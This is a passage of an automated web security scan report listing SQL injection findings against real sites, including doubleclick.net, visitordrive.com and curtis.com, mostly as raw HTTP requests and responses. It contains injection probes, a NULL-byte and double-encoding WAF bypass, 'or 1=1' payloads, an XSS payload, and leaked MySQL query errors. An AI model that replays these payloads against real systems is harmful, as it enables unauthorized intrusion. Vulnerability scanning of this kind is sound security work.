Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:21:53 GMT
Server: cafe
Cache-Control: private
Content-Length: 1470
X-XSS-Protection: 1; mode=block

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><iframe src="http://view.atdmt.com/MRT/iview/302482152/direct;wi.728;hi.90/01/519758469?click=http://googleads.g.
...[SNIP]...

1.6. http://googleads.g.doubleclick.net/pagead/ads [u_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_cd parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_cd parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16'&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:34 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12317

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
L3hzcy1kb3JrLWNyb3NzLXNpdGUtc2NyaXB0aW5nLW1zbndoaXRlcGFnZXNjb20uaHRtbKgDAcgDF-gD3QXoA4oD6APiBegDugL1AwIAAMQ&num=2&sig=AGiWqtyvoRnT7_XBYCMbzl_kBgPSVrAlcA&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16''&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 14:00:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4098

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.7. http://googleads.g.doubleclick.net/pagead/ads [u_h parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The u_h parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u_h parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00'&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:22 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtyi1rn2uRrvPguh1q-agLK2-d5y9A&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200%00''&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:58:23 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12481

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.8. http://googleads.g.doubleclick.net/pagead/ads [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The url parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the url parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the url request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:18 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12234

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
4c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWwnqAMByAMX6APdBegDigPoA-IF6AO6AvUDAgAAxA&num=2&sig=AGiWqty8MXeYQZr7hKVhCpbj7a3Uah-E1Q&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html%2527%2527&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Apr 2011 13:50:19 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12603

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.9. http://googleads.g.doubleclick.net/pagead/ads [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The w parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the w parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728'&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:24:21 GMT
Server: cafe
Cache-Control: private
Content-Length: 12314
X-XSS-Protection: 1; mode=block

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
y94c3MtZG9yay1jcm9zcy1zaXRlLXNjcmlwdGluZy1tc253aGl0ZXBhZ2VzY29tLmh0bWyoAwHIAxfoA90F6AOKA-gD4gXoA7oC9QMCAADE&num=2&sig=AGiWqtx6GWNZkt3zuGqGDv8UVFUYZSOPDg&client=ca-pub-4063878933780912&adurl=http://www.errorteck.com" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_top title="www.ErrorTeck.com">
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728''&lmt=1303152345&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fdork%2Fxss%2Fxss-dork-cross-site-scripting-msnwhitepagescom.html&dt=1303134345412&shv=r20110406&jsv=r20110415&saldr=1&correlator=1303134345434&frm=0&adk=1607234649&ga_vid=1261559504.1303134345&ga_sid=1303134345&ga_hid=1029345448&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1295&bih=1003&eid=33895130&fu=0&ifi=1&dtd=47&xpc=DSN8tnnlAu&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 21 Apr 2011 08:24:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 12331
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.10. http://visitordrive.com/evTracker/evtracker.php [_evacct parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/evtracker.php

Issue detail

The _evacct parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the _evacct parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /evTracker/evtracker.php?_evacct=1'&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 299
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL: select name from client where clientID='1''<br>
<b>MySQL Error</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

Request 2

GET /evTracker/evtracker.php?_evacct=1''&_evT=Miller%20-%20Where%20to%20Buy%20-%20Distributor%20Locator&_evId=fc0c626fe6241db934df6d4f182a5f42&_evRef=http%3A//www.millerwelds.com/landingf0d5d%2522%253E%253Ca%253E5d463450d54/drive/%3Futm_source%3DPowerBlockTV%26utm_campaign%3Dtoolsthatdrive%26utm_medium%3Dbannerad%26utm_content%3Donline&_evUrl=http%3A//www.millerwelds.com/wheretobuy/ HTTP/1.1
Host: visitordrive.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 17:28:48 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 0
Connection: close
Content-Type: text/html


1.11. http://visitordrive.com/evTracker/services/keywords.php [edate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The edate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the edate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011'&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 536
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '23:59:59'
       AND `pathQuery` != ''' at line 6)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011&edate=04%2f18%2f2011''&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.12. http://visitordrive.com/evTracker/services/keywords.php [sdate parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitordrive.com
Path:   /evTracker/services/keywords.php

Issue detail

The sdate parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sdate parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011'&edate=04%2f18%2f2011&_=

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 574
Connection: close
Content-Type: text/html

</td></tr></table><b>Database error:</b> Invalid SQL:        select date_format(`cdate`,'%Y') as year,
       date_format(`cdate`,'%m') as month,
       date_format(`cdate`,'%d') as day,
       `pathQuery`
       from click
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '00:00:00'
       AND `cdate` < '2011-04-18 23:59:59'
       AND `pathQuery` != ''' at line 5)<br>
...[SNIP]...

Request 2

POST /evTracker/services/keywords.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.0_rc1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: visitordrive.com
Accept-Encoding: gzip, deflate
Content-Length: 44

sdate=04%2f18%2f2011''&edate=04%2f18%2f2011&_=

Response 2

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 18:15:50 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.4.2
Content-Length: 2
Connection: close
Content-Type: text/html

[]

1.13. http://www.curtis.com/emaildisclaimer.cfm [CFID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /emaildisclaimer.cfm

Issue detail

The CFID cookie appears to be vulnerable to SQL injection attacks. The payloads 53431827%20or%201%3d1--%20 and 53431827%20or%201%3d2--%20 were each submitted in the CFID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /emaildisclaimer.cfm?itemID=%22%20onmouseover%3dprompt%28937974%29%20bad%3d%22&itemname=Curtis,%20Mallet-Prevost,%20Colt%20%26%20Mosle%20LLP.&itemType=1 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
